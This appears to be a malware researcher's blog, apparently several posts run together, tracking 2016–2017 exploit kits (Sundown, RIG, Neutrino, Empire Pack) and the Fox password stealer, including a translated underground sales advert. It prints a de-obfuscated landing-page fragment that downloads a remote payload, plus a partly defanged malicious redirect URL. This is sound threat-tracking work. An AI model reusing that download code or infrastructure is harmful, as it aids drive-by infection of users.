providing again (cf CVE-2016-0189) ready-to-use code to Exploit Kit maintainer.
After not far from 6 months without new exploit integrated in an EK ecosystem which has lost its innovation locomotive (Angler) , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.
The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.
[edit : 2017-01-10] I have been told that with Win10 1607, Microsoft Edge has some quite strong mitigation: no WinExec, no CreateProcess, no ShellExecute, meaning every child process creation is blocked. The PoC might need a little more "magic powder" to work there. [/edit]
Sundown: 2017-01-06
Sundown EK firing CVE-2016-7200/7201 to Edge 2017-01-06 No exploitation here though
Out of topic: expected payload in that infection chain was zloader. (other payload seen in past weeks dropped via Sundown : Zeus Panda, Neutrino Bot, Dreambot, Chthonic, Andromeda, Smokebot, Betabot, Remcos, IAP, RTM, Kronos, Bitcoin Miner)
Neutrino: 2017-01-14 -- Thanks to Trendmicro for the multiple inputs that allowed me to keep plugged to this infection chain. -- So as explained previously Neutrino is now in full private mode and fueled via Malvertising bought to several ad agencies (e.g. ZeroPark, ClickAdu, PropellerAds, HillTopAds) by a Traffer actor which I tag as NeutrAds. Their infection chain is now accepting/redirecting Microsoft Edge Browser as well. Without big surprise a new exploit is included in the Flash bundle : nw27 > CVE-2016-7200/7201.
NeutrAds redirect is now accepting Edge traffic - 2017-01-14
http://67.198.186[.254/ca.php?m=525441744D5441744D6A63744E3055744D554D745130493D&h=437 Edits: 2016-11-10 - Adding information about mitigation on Edge 2016-11-14 - Adding Neutrino 2016-11-16 - Fixed the screenshot for Neutrino. Was stating CVE-2016-4117 was there. It's not 2016-11-16 - Adding Kaixin
Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware.
Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016
RIG += internal TDS :
Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG] I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me) Picture2: Blackhole - 2012 - Internal TDS illustration but disappeared from the market with the end of Nuclear Pack Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustration and Angler EK Picture 4 : Angler EK - Internal TDS illustration This is a key feature for load seller. It is making their day to day work with traffic provider far easier . It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.
Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country). Picture 5: A Sutra TDS in action in 2012 - cf The path to infection
Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared. A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189 Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.
Neutrino waves goodbye ?
On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :
“we are closed. no new rents, no extends more”
This explains a lot. Here are some of my last Neutrino pass for past month.
Picture 8: Some Neutrino passes for past month and associated taxonomy tags in Misp
As you can see several actors were still using it…Now here is what i get for the past days :
Picture 9: Past days in DriveBy land Not shown here, Magnitude is still around, mostly striking in Asia Day after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground.
Picture 10: Last banner for Neutrino as of 2016-09-16 Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.
Side reminder : Neutrino disappeared from march 2014 till november 2014
A Neutrino Variant
Several weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino. Picture 11: Neutrino-v pass on the 2016-09-21 Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder Note the pnw26 with no associated binary data, the rubbish and additionalInfo A Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523
Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api
functionk2(k) { var y = a(e + "." + e + "Request.5.1"); y.setProxy(n); y.open("GET", k(1), n); y.Option(n) = k(2); y.send(); if (200 == y.status) return Rf(y.responseText, k(n)) };
Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail) I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it) Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079x
Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised. Picture 15: King of Loads - Empire Pack Panel Some might feel this interface quite familiar…A look a the favicon will give you a hint Picture 16: RIG EK favicon on Empire Pack panel Picture 17: RIG Panel It seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.
[Speculation] I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections. [/Speculation]
RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, I don’t know. I am aware of 3 variants of the API to RIG
api.php : historical RIG
api3.php : RIG with internal TDS [ 2016-10-08 : This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]
remote_api.php : RIG-v
But Empire Pack might be api3, remote_api, or a bit of both of them.
By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there. :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing)
Conclusion
Let’s just conclude this post with statistics pages of two Neutrino threads Picture 18: Neutrino stats - Aus focused thread - 2016-07-15 Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09
“We will be known forever by the tracks we leave” Santee Sioux Tribe
2016-10-03 : Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos. Added explanation about the IP whitelisting on RIG API (it was not clear) 2016-10-08 : Updated with gained information on Empire Pack 2016-11-01 : RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4. https://twitter.com/kafeine/status/790482708870864896
RIG panel
The only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern) 2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)
RIG-E Behavioral
2016-12-03 RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.
Small data drop about another Pony fork : Fox stealer. First sample of this malware I saw was at beginning of September 2016 thanks to Malc0de. After figuring out the panel name and to which advert it was tied we were referring to it as PonyForx.
Advert : 2016-08-11 - Sold underground by a user going with nickname "Cronbot"
-------- Стилер паролей и нетолько - Fox v1.0 Мы выпускаем продукт на продажу. Уже проходит финальная стадия тестирования данного продукта. О продукте : 1. Умеет все что умеет пони. + добавлен новый софт. 2. Актуален на 2016 год. 3. Написан на С++ без дополнительных библиотек. 4. Админка от пони. Условия : 1. Только аренда. 2. Распространяется в виде EXE и DLL. 3. Исходники продавать не будем. Аренда 250$ в месяц. Исходники 2000$ разово.
----Translated by Jack Urban : ----
Password stealer and more - Fox v.1.0
We are releasing the product for general sale. Final stage of testing for this product is already underway.
About the product:
1. Is able to do everything that pony does. + new software has been added.
2. Relevant for 2016.
3. Written in C++ without additional libraries.
4. Admin from pony.
Conditions:
1. For rent only.
2. Distributed as an EXE and DLL.
3. We will not be selling the source.
Rent is $250 a month.
Originals are a 2000$ one time fee.
--------
It's being loaded (with Locky Affid 13) by the Godzilla from ScriptJS (aka AfraidGate) group .
MISP taxonomy tags reflecting ScriptJS activity in the last months
(note : it's not the first time this group is pushing a stealer, they were dropping Pony with their Necurs between August and December 2015 [1] )
2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13 Here we can see the browsing history of the VM being sent to PonyForx (Fox stealer) C2